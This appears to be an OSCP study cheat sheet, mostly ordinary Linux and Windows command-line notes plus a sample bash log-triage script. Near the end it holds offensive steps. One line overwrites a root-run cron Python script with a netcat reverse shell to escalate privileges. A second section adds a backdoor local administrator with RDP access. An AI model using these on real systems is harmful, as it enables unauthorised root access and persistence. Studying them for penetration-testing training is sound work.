OSCP
Linux / Windows: Main commands
Linux main commands in OSCP

Find:

# Search the whole filesystem by name. 2>/dev/null discards the
# "Permission denied" errors for directories you cannot read.
find / -name file 2>/dev/null

# Long listing sorted by modification time, reversed, so the most recently
# changed files end up at the bottom (-l long, -t time, -r reverse).
ls -ltr

# Remove a directory recursively together with its content. Very dangerous command!
rm -rf ./directory

# List which commands the current user may run with sudo, and as which user.
sudo -l

Which

Outputs the path of the binary you are looking for. It searches the directories listed in your $PATH variable.

which bash
# Usually outputs: /bin/bash

Filters

# sort
sort test.txt

# uniq: both forms print every distinct line once. uniq alone only collapses
# adjacent duplicates, so the input has to be sorted first.
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName

grep

head

tail

tr

sed
# Delete the first line.
sed "1d"

# cut: given a ping line such as
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
# the fourth space-separated field is the address. The trailing colon is
# part of the field, so it comes out as "192.168.0.1:".
cut -d" " -f4
-d stands for delimiter, -f for field.

tr - Translate

# Transform all letters into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2

# Remove characters (here every dot)
cat file.txt | tr -d "."

# Replace every dot with an underscore.
cat file.txt | tr "." "_"

awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

# Print the lines matching the pattern. An unescaped dot in the pattern
# matches any character; write \. to match a literal dot.
awk '/172.16.40.10.81/' error.log

# Print every line (the default action).
awk '{print}' filename

We can use the -F flag to set a custom delimiter, for example to print the first colon-separated column: awk -F ':' '{print $1}' test.txt

If you are manipulating some text you might want to start the output with some information about the columns. To do that we can use the BEGIN keyword; an END block runs after the last line has been processed.

awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head

awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail

# List the current user's cronjobs
crontab -l

# Edit or create new cronjobs
crontab -e

# List all disks and partitions
fdisk -l

# Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh

Netstat - Find outgoing and incoming connections

Netstat exists on Linux, macOS and Windows, but the flags differ per platform; the ones below are the Linux ones: -a all sockets, -n numeric addresses instead of names, -t TCP only, -l listening sockets, -p the owning PID and program name (you need root to see other users' processes).

$ netstat -antlp

netstat -anpt

# List the rules of the filter table (add --line-numbers to see the rule
# indices that -D expects).
iptables -L

# Remove one specific rule: the second rule of the INPUT chain
iptables -D INPUT 2
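Added example, not part of the original notes: the filters above (grep, awk, cut, tr, sort, uniq, head, sed) chained together to triage an sshd log. The log lines, the host name web01, the addresses and the file under /tmp are all constructed for the example.

```shell
#!/bin/bash
# Added example (not from the original notes): chaining the filters from the
# section above to triage a small, constructed sshd log. Every host name,
# address and path here is made up for the demonstration.

LOG="${TMPDIR:-/tmp}/auth_sample.log"

# Write the constructed sample log (not real data).
make_sample_log() {
cat > "$LOG" <<'EOF'
Mar  3 10:01:12 web01 sshd[2231]: Failed password for invalid user admin from 10.0.0.5 port 51022 ssh2
Mar  3 10:01:15 web01 sshd[2231]: Failed password for invalid user admin from 10.0.0.5 port 51023 ssh2
Mar  3 10:01:19 web01 sshd[2240]: Accepted publickey for deploy from 10.0.0.9 port 40010 ssh2
Mar  3 10:02:02 web01 sshd[2255]: Failed password for root from 192.168.1.20 port 33104 ssh2
Mar  3 10:02:07 web01 sshd[2255]: Failed password for root from 10.0.0.5 port 51030 ssh2
Mar  3 10:03:44 web01 CRON[2260]: (root) CMD (/opt/tmp.py)
EOF
}

# Failed logins per source address, most frequent first.
# awk walks the fields and prints the word after "from", so it does not care
# that "invalid user admin" shifts the field positions around.
failed_login_counts() {
    grep 'Failed password' "$LOG" \
        | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
        | sort | uniq -c | sort -rn
}

# Address with the most failed logins (uniq -c prints "count address").
top_offender() {
    failed_login_counts | head -n 1 | awk '{ print $2 }'
}

# Distinct usernames that were tried, space separated. The name follows
# "for", or "for invalid user" when the account does not exist.
attempted_users() {
    grep 'Failed password' "$LOG" \
        | awk '{ for (i = 1; i <= NF; i++) if ($i == "for") { u = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1); print u } }' \
        | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# PIDs of the sshd processes seen. tr -s squeezes the double space in
# "Mar  3" so that cut -d" " lands on the right field; the PID is then
# carved out of "sshd[2231]:" with two more cuts.
sshd_pids() {
    grep 'sshd\[' "$LOG" \
        | tr -s ' ' | cut -d' ' -f5 \
        | cut -d'[' -f2 | cut -d']' -f1 \
        | sort -u | tr '\n' ' ' | sed 's/ $//'
}

make_sample_log
echo "Failed logins per source:"
failed_login_counts
echo "Top offender: $(top_offender)"
echo "Users tried:  $(attempted_users)"
echo "sshd PIDs:    $(sshd_pids)"
```

The awk field walk is the robust part: a fixed `cut -f` on these lines would pick different words depending on whether the failed user exists, and `cut -d" "` on the raw timestamp would hit the empty field produced by the double space in "Mar  3".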
Iteration over a file

This script iterates over a file and echoes every word in it. Note that $(cat file.txt) is split on whitespace (and each word is glob-expanded), so a line containing spaces comes out as several items; it is not a line-by-line loop:

#!/bin/bash

for line in $(cat file.txt); do
echo "$line"
done
Another Way

Read the file line by line instead. IFS= keeps leading and trailing whitespace of each line, and -r stops read from interpreting backslashes:

#!/bin/bash

while IFS= read -r p; do
echo "$p"
done < file.txt
For Loops

#!/bin/bash

for ((i = 0; i < 10; i++)); do
echo $i
done

Another way to write this is by using the program seq. seq is pretty much like range() in Python, except that both ends are inclusive. It can be used like this:

#!/bin/bash

for x in $(seq 1 100); do
echo $x
done
Locate a file by name and show only the last match. locate queries the database built by updatedb, so results can be stale and will miss files created since the last run:

#!/bin/bash

locate 646.c | tail -n 1

To print that file directly, wrap the command in $( ):

#!/bin/bash

cat $(locate 646.c | tail -n 1)
VI Operators

Operators are commands that do things, like delete, change or copy.
c - change
ce - change until the end of the word
c$ - change until the end of the line

Combining Motions and Operators

Now that you know some motion commands and operator commands, you can start combining them.
dw - delete word
d$ - delete to the end of the line
Password Creation

# Hash the password "sam" in crypt format, for example to build a line for
# /etc/passwd or /etc/shadow. Without an algorithm flag the default depends
# on the OpenSSL version; pass -1 (MD5) or -6 (SHA-512) to pick it explicitly.
openssl passwd sam
Windows Commands

cmd:

Show all files including hidden ones (/A:H lists only the hidden ones)
dir /A

Print out file content, like cat
type file.txt

grep-like search: print the lines of file.txt containing the pattern
findstr "pattern" file.txt

Show network connections and listening ports
netstat -an

Show network adapter info
ipconfig

Traceroute
tracert

List processes
tasklist

Kill a process
taskkill /PID 1532 /F

Overwrite the free (deallocated) space on the C: drive so that deleted files cannot be recovered. It does not touch existing files, but it takes a long time and is very noisy.
cipher /w:C:\

List logical drives, local and mapped
wmic logicaldisk get deviceid, volumename, description
Scripts for fun

Make a request (Python 3):

import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)

Read a file line by line:

with open("readme.txt", "r") as file_open:
    for line in file_open:
        line = line.strip("\n")
        print(line)
        # "rad 4" is Swedish for "line 4": the last line of the sample file
        if line == "rad 4":
            print("last line")

Overwrite a Python script that runs as root (for example from a cron job) with a reverse shell; replace ip and port with your listener. The -e flag needs a netcat build that supports it (nc.traditional or ncat), not the OpenBSD one:

echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
Add RDP User

Windows: create a local user, make it a local administrator and allow it to log in over RDP.

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry

Enable RDP via registry